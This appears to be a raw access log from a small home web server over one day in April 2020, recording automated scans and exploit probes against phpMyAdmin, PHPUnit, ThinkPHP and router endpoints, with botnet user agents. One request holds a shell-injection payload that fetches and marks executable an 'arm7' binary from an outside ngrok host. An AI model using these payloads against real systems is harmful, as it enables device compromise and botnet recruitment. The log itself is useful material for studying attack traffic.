Tue Apr 7 06:25:06 MDT 2020 06:25:06 up 42 days, 10:53, 1 user, load average: 0.58, 0.34, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 42days 33:02 2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE 83.179.234.2 - - [07/Apr/2020:13:19:45 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 83.179.234.2 - - [07/Apr/2020:13:19:47 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 83.179.234.2 - - [07/Apr/2020:13:19:53 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 83.179.234.2 - - [07/Apr/2020:13:20:00 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 162.250.19.7 - - [07/Apr/2020:13:29:47 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [07/Apr/2020:13:31:49 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 223.149.182.208 - - [07/Apr/2020:16:22:50 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 110.232.248.12 - - [07/Apr/2020:16:31:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 103.238.109.87 - - [07/Apr/2020:16:35:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 18.236.254.19 - - [07/Apr/2020:16:37:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 79.107.93.57 - - [07/Apr/2020:16:43:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 79.107.93.57 - - [07/Apr/2020:16:43:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 85.93.20.170 - - [07/Apr/2020:16:45:41 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 128.14.209.242 - - [07/Apr/2020:17:01:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 183.134.104.148 - - [07/Apr/2020:17:08:34 +0000] "GET / HTTP/1.0" 200 25000 "" "" 115.238.44.237 - - [07/Apr/2020:17:09:09 +0000] "GET / HTTP/1.0" 200 25000 "" "" 5.182.211.230 - - [07/Apr/2020:17:54:06 +0000] "GET / HTTP/1.1" 200 25000 "" "" 91.199.118.136 - - [07/Apr/2020:18:07:43 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 91.199.118.136 - - [07/Apr/2020:18:07:44 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 94.102.56.151 - - [07/Apr/2020:18:22:22 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.43" 138.197.130.139 - - [07/Apr/2020:18:46:16 +0000] "GET /index.php HTTP/1.1" 404 0 "" "" 5.196.65.85 - - [07/Apr/2020:19:35:37 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 5.196.65.85 - - [07/Apr/2020:19:35:40 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 5.196.65.85 - - [07/Apr/2020:19:35:43 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 5.8.10.202 - - [07/Apr/2020:19:47:46 +0000] "GET /db HTTP/1.1" 404 0 "" "Go-http-client/1.1" 5.101.0.209 - - [07/Apr/2020:20:02:26 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [07/Apr/2020:20:05:14 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [07/Apr/2020:20:05:14 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [07/Apr/2020:20:06:19 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 159.224.204.12 - - [07/Apr/2020:20:28:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 60.191.52.254 - - [07/Apr/2020:20:34:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 60.191.52.254 - - [07/Apr/2020:20:34:57 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 162.250.19.7 - - [07/Apr/2020:20:35:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 49.84.60.166 - - [07/Apr/2020:21:01:23 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 0 "" "Hello, World" 178.218.59.255 - - [07/Apr/2020:21:03:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 190.130.22.46 - - [07/Apr/2020:21:24:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 5.101.0.209 - - [07/Apr/2020:21:53:14 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [07/Apr/2020:22:09:23 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 35.164.73.92 - - [07/Apr/2020:22:14:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" 51.68.225.51 - - [07/Apr/2020:23:13:53 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 201.184.180.163 - - [08/Apr/2020:00:04:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 171.67.70.85 - - [08/Apr/2020:00:53:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 47.101.187.185 - - [08/Apr/2020:01:24:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0" 77.38.249.48 - - [08/Apr/2020:01:25:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.153.197.104 - - [08/Apr/2020:02:22:22 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.153.197.104 - - [08/Apr/2020:02:27:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 87.107.58.68 - - [08/Apr/2020:02:57:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 50.241.16.1 - - [08/Apr/2020:03:16:11 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 400 0 "" "" 50.241.16.1 - - [08/Apr/2020:03:16:11 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 36.89.135.79 - - [08/Apr/2020:03:24:53 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 36.89.135.79 - - [08/Apr/2020:03:24:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 36.89.135.79 - - [08/Apr/2020:03:24:59 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 36.89.135.79 - - [08/Apr/2020:03:25:00 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 192.119.248.242 - - [08/Apr/2020:03:41:02 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 192.119.248.242 - - [08/Apr/2020:03:41:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 78.165.126.92 - - [08/Apr/2020:03:49:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 162.243.128.209 - - [08/Apr/2020:04:27:57 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 83.97.20.34 - - [08/Apr/2020:04:28:39 +0000] "GET / HTTP/1.0" 200 25000 "" "" 177.9.101.223 - - [08/Apr/2020:04:57:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 92.112.32.157 - - [08/Apr/2020:05:36:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 122.49.79.34 - - [08/Apr/2020:05:37:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 165.22.84.3 - - [08/Apr/2020:06:21:38 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:22:06 +0000] "GET /scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:22:34 +0000] "GET /db/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:23:02 +0000] "GET /admin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:23:31 +0000] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 103.79.35.221 - - [08/Apr/2020:06:50:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:54:45 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:55:14 +0000] "GET /scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:55:42 +0000] "GET /db/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:56:11 +0000] "GET /admin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 165.22.84.3 - - [08/Apr/2020:06:56:40 +0000] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 109.235.7.1 - - [08/Apr/2020:08:00:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 187.49.48.60 - - [08/Apr/2020:08:02:12 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 187.49.48.60 - - [08/Apr/2020:08:02:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 187.49.48.60 - - [08/Apr/2020:08:02:13 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 187.49.48.60 - - [08/Apr/2020:08:02:14 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 121.204.204.192 - - [08/Apr/2020:08:36:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 51.254.59.113 - - [08/Apr/2020:08:37:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:26 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:27 +0000] "GET /delinquent-accounts/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:28 +0000] "GET /documents/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:28 +0000] "GET /downloads/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:29 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:29 +0000] "GET /memes/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:30 +0000] "GET /music/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:31 +0000] "GET /pictures/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:31 +0000] "GET /va/ HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:32 +0000] "GET /videos/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:32 +0000] "GET /ac0xl/ac0xl/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:33 +0000] "GET /ac0xl/ac0xl/Dont-Be-Evil/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:33 +0000] "GET /ac0xl/ac0xl/illuminati/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:34 +0000] "GET /ac0xl/ac0xl/logs/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:34 +0000] "GET /ac0xl/ac0xl/www/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:35 +0000] "GET /delinquent-accounts/delinquent-accounts/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:35 +0000] "GET /delinquent-accounts/delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:36 +0000] "GET /documents/documents/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:36 +0000] "GET /downloads/downloads/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:37 +0000] "GET /downloads/downloads/4laws.com/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:37 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:38 +0000] "GET /freedom/freedom/freedom/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:39 +0000] "GET /freedom/freedom/freedom-2020-01-08/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:39 +0000] "GET /memes/memes/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:40 +0000] "GET /music/music/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:40 +0000] "GET /music/music/Songs/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:41 +0000] "GET /pictures/pictures/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:41 +0000] "GET /pictures/pictures/StMichaelTheArchangelMission/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:42 +0000] "GET /videos/videos/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:42 +0000] "GET /freedom/freedom/freedom/freedom/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [08/Apr/2020:08:37:43 +0000] "GET /freedom/freedom/freedom/freedom/thttpd-extras/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 192.241.237.130 - - [08/Apr/2020:08:43:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 74.84.255.220 - - [08/Apr/2020:08:59:09 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 74.84.255.220 - - [08/Apr/2020:08:59:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 200.232.237.196 - - [08/Apr/2020:09:43:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 5.8.10.202 - - [08/Apr/2020:09:52:02 +0000] "GET /cards HTTP/1.1" 404 0 "" "Go-http-client/1.1" 103.124.12.1 - - [08/Apr/2020:10:12:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 89.203.13.6 - - [08/Apr/2020:10:13:53 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 162.243.69.215 - - [08/Apr/2020:10:13:54 +0000] "GET / HTTP/1.1" 200 25000 "162.250.19.7" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" 162.243.69.215 - - [08/Apr/2020:10:13:54 +0000] "GET /boaform/admin/formPing HTTP/1.1" 404 0 "162.250.19.7" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" 41.207.161.106 - - [08/Apr/2020:10:13:54 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET" 41.207.161.106 - - [08/Apr/2020:10:13:54 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 138.94.84.180 - - [08/Apr/2020:10:31:35 +0000] "GET / HTTP/1.1" 400 0 "" "" 5.236.181.206 - - [08/Apr/2020:11:01:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" Wed Apr 8 06:25:06 MDT 2020 06:25:06 up 43 days, 10:53, 1 user, load average: 0.53, 0.32, 0.25 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 43days 33:38 2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE